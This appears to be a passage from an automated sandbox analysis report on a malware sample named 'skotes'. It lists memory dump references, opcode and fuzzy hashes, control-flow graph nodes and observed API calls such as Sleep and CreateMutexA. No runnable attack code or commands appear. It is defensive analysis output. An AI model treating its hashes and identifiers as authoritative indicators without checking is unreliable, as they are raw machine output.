                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                                                              • Opcode ID: 0685a62df57e28a171e49999de1682a2b8f31ab590b97dc5142c2ba969d44302
                                                                                                                                                                                                                                                              • Instruction ID: 1a0862b7eded8f1a94e24e10650f656125b55f1e4c96dc65e32c671f2ec98086
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0685a62df57e28a171e49999de1682a2b8f31ab590b97dc5142c2ba969d44302
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41E08C30140108AFCF357F58D84DD983BAAEB55789F042C11F81866322CB36DED2C690

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: e57ba164e4c2b50b038be4296d6277ed9237e475e65f4badd6432b229a61600b
                                                                                                                                                                                                                                                              • Instruction ID: db0b9df0845d50cf427dc7bd5b26434e71342b432a60d50f2069ca461d7e874a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57ba164e4c2b50b038be4296d6277ed9237e475e65f4badd6432b229a61600b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13312A717046048BEB08DB78DC8979EF7A6EBCA320F245218E014BB3D6D775A981C751

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 22 ea9f44-ea9f64 26 ea9f92-ea9fae 22->26 27 ea9f66-ea9f72 22->27 30 ea9fdc-ea9ffb 26->30 31 ea9fb0-ea9fbc 26->31 28 ea9f88-ea9f8f call ebd663 27->28 29 ea9f74-ea9f82 27->29 28->26 29->28 32 eaa92b 29->32 36 eaa029-eaa916 call eb80c0 30->36 37 ea9ffd-eaa009 30->37 34 ea9fbe-ea9fcc 31->34 35 ea9fd2-ea9fd9 call ebd663 31->35 39 eaa953-eaa994 Sleep CreateMutexA 32->39 40 eaa92b call ed6c6a 32->40 34->32 34->35 35->30 43 eaa00b-eaa019 37->43 44 eaa01f-eaa026 call ebd663 37->44 52 eaa996-eaa998 39->52 53 eaa9a7-eaa9a8 39->53 40->39 43->32 43->44 44->36 52->53 54 eaa99a-eaa9a5 52->54 54->53
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742328703.00000000010FC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742345359.00000000010FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742364081.0000000001102000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742385114.0000000001103000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742403557.0000000001109000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742420325.000000000110A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742437683.000000000110D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742456555.0000000001115000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742475321.0000000001117000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742493214.0000000001118000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742511049.000000000111D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742527861.000000000111E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742545139.0000000001125000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742585813.000000000112E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742603605.000000000112F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742621245.0000000001137000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742638056.000000000113A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742675407.000000000114A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742693428.000000000114D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743293929.000000000114E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743372583.0000000001150000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743425236.000000000116F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.0000000001170000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1743442942.000000000117A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744551425.00000000011A8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744668521.00000000011A9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744956223.00000000011AA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1744983330.00000000011AE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745005449.00000000011B0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745061256.00000000011BE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1745080109.00000000011BF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_ea0000_skotes.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 21bd9785c312229249a2fe9c79a29afb95b669e8071e13218c2f81c13d3425dd
                                                                                                                                                                                                                                                              • Instruction ID: 1d0dbc5bb20ff7fd0b2df7190fc632c12635529c88459a430b43ff3df6e1de05
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21bd9785c312229249a2fe9c79a29afb95b669e8071e13218c2f81c13d3425dd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA314A317042048BEB189B78DC997ADB7A6EFCA310F245228E014FF3D6D736A980C712

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 56 eaa079-eaa099 60 eaa09b-eaa0a7 56->60 61 eaa0c7-eaa0e3 56->61 62 eaa0a9-eaa0b7 60->62 63 eaa0bd-eaa0c4 call ebd663 60->63 64 eaa111-eaa130 61->64 65 eaa0e5-eaa0f1 61->65 62->63 66 eaa930-eaa994 call ed6c6a Sleep CreateMutexA 62->66 63->61 70 eaa15e-eaa916 call eb80c0 64->70 71 eaa132-eaa13e 64->71 68 eaa0f3-eaa101 65->68 69 eaa107-eaa10e call ebd663 65->69 86 eaa996-eaa998 66->86 87 eaa9a7-eaa9a8 66->87 68->66 68->69 69->64 76 eaa140-eaa14e 71->76 77 eaa154-eaa15b call ebd663 71->77 76->66 76->77 77->70 86->87 88 eaa99a-eaa9a5 86->88 88->87
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00EAA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00F03254), ref: 00EAA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
